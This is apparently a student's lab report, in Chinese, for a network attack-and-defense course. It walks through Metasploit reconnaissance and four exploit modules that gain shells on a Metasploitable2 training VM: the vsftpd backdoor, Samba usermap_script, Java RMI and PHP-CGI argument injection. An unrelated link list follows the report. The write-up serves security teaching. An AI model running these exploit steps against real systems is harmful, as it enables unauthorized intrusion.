当前位置: 首页 > news >正文

20232422 2025-2026-1 《网络与系统攻防技术》实验六实验报告

20232422 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

本次实验是Metasploit工具的实战应用,先通过主机发现、端口扫描完成前期信息搜集,再针对Metasploitable2靶机的4个已知漏洞(Vsftpd后门漏洞、Samba MS-RPC命令注入漏洞、Java RMI Server命令执行漏洞、PHP CGI参数注入漏洞),分别运用Metasploit对应模块完成漏洞利用,掌握渗透测试流程和工具操作。

2.实验过程

2.1 前期准备

  • 确认靶机IP:靶机登录后执行ifconfig,确认靶机IP为192.168.216.133。
    98446e3b14b1b99459ee88a4d90bbae2

2.2 前期渗透

2.2.1 主机发现(arp_sweep模块)

  • 启动Metasploit:Kali终端输入msfconsole
  • 选择模块:输入search arp_sweep,执行use auxiliary/scanner/discovery/arp_sweep
  • 配置参数:输入set RHOSTS 192.168.216.0/24,执行run
  • 结果:成功扫描到靶机192.168.216.133。
    9b5b5ee2a7c8b582ffb57f20c47cde70
    077e063969cab8920fbbfa242299ac81

2.2.2 端口扫描(tcp模块)

  • 选择模块:输入search portscan/tcp,执行use auxiliary/scanner/portscan/tcp

  • 配置参数:输入set RHOSTS 192.168.216.133,执行run
    01896614a45dc92ca76a7796cf2a56cd

  • 结果:扫描到靶机开放21、80、139、1099等目标端口。
    41656aecd77c6d1b660404a433c37cd3

2.2.3 系统版本扫描

  • ,执行nmap -sV 192.168.216.133
  • 结果:获取靶机系统版本及开放服务版本信息。

2.3 漏洞利用实战

2.3.1 Vsftpd源码包后门漏洞(21端口)

  • 选择模块:执行use exploit/unix/ftp/vsftpd_234_backdoor
  • 配置参数:输入set RHOST 192.168.216.133
  • 发起攻击:执行exploit,成功建立会话。
  • 验证命令:依次执行uname -apwdid,均显示正常结果。
    986a3865172d6432c101c1131fb4eafb

2.3.2 Samba MS-RPC Shell命令注入漏洞(139端口)

  • 选择模块:执行use exploit/multi/samba/usermap_script
  • 配置参数:输入set RHOST 192.168.216.133
  • 发起攻击:执行exploit,成功进入命令行。
  • 验证:执行uname -a,显示靶机系统信息。
    bba02194bcb20cda9b8e6476f9e30457

2.3.3 Java RMI SERVER命令执行漏洞(1099端口)

  • 确认端口:执行nmap -p 1099 192.168.216.133,确认端口开放。
    434c602cbb2ca8b16438b6b753492330

  • 选择模块:执行use exploit/multi/misc/java_rmi_server

  • 配置参数:输入set RHOST 192.168.216.133

  • 发起攻击:执行exploit,成功创建会话(假设会话ID为1)。

  • 进入会话:执行sessions -i 1,输入shell,执行whoami验证权限。
    0733f898763f031bc3374a6163c33ce4

2.3.4 PHP CGI参数执行注入漏洞(80端口)

  • 选择模块:执行use exploit/multi/http/php_cgi_arg_injection
  • 配置参数:输入set RHOST 192.168.216.133
  • 发起攻击:执行exploit,成功进入命令行。
  • 验证:执行lswhoami,显示正常结果。
    3786aa622a2eded96303dc6b19734c97

3.问题及解决方案

  • 问题1:Kali无法ping通靶机,主机发现扫描不到192.168.216.133
    解决方案:关闭Kali防火墙,重启靶机重新获取IP,再次扫描成功。
  • 问题2:执行Java RMI漏洞利用后,输入sessions -i未显示会话
    解决方案:重启Metasploit,重新配置参数发起攻击,成功创建会话。
  • 问题3:msfconsole权限不足
    解决方案:使用'sudo msfconsole'

4.学习感悟、思考等

本次实验我掌握了 Metasploit 核心操作,从靶机信息收集到漏洞利用,参数配置和漏洞原理认知缺一不可。发现靶机漏洞多因为没有更安全补丁、输入校验缺失。而且我意识到仅会Metasploit等工具是不够的,后续还有学习深究漏洞底层逻辑,提升技术水平。

参考资料

  • Metasploitable2 Exploitability Guide
  • Metasploit模块使用官方文档

http://www.jsqmd.com/news/47851/

相关文章:

  • 毕业论文写作全流程:从选题到答辩的完整指南
  • html空间如何添加滚动条
  • 实用指南:Jenkins 持续集成与部署指南
  • 2025年11月DR耐油橡胶热缩管,氟橡胶热缩管,防滑花纹热缩管厂家最新推荐:耐老化性能实测榜单
  • 2025年11月DR耐油橡胶热缩管,线缆标识热缩管,防滑花纹热缩管厂商推荐:耐油等级与使用寿命解析
  • [游记]CSP 2025
  • 11.22题解
  • 电梯调度问题的三次迭代
  • 【minimap2】一定要注意组合参数
  • 3-数据库
  • 4-java
  • 重构高阶智驾:天瞳威视以国产芯片,解锁Robotaxi平民化路径 - 实践
  • 1-计算机网络
  • 实用指南:MCU定点计算深度解析:原理、技巧与实现
  • 2-操作系统
  • html空间如何添加图片
  • html空间可以设置边框吗
  • 【SpringBoot从初学者到专家的成长23】利用SpringBoot构建高效的Web应用-拥抱你的第一个SpringBoot项目
  • PyCharm,Run Configurations,Python interpreter下拉框会显示哪些地方的python.exe
  • Deepseek大模型结合Chrome搜索爬取2025AI投资趋势数据 - 指南
  • 聚焦GeoAI!6本遥感地学好刊全解析,助你精准投稿
  • call 与 delegatecall - all-in
  • 20232417 2025-2026-1 《网络与系统攻防技术》实验六实验报告
  • Trick——字符串
  • 2022年春季研究资助计划征集技术提案
  • BLOG-1-电梯调度算法
  • 线圈公司质量排名,线圈生产厂家性价比推荐,变压器公司行业排名,变压器生产厂家客户推荐。滤波器公司技术排名,开关变压器公司性价比榜单
  • IDA之修复结构体
  • 2025年专业集成房屋安装公司排名,集成活动房十大靠谱厂家推荐榜,石家庄集成房屋公司十大排行:义广达彩钢口碑推荐榜,河北集成活动房厂家十大推荐榜
  • 真的好怪题解:P14314 [Aboi Round 2] Oneshot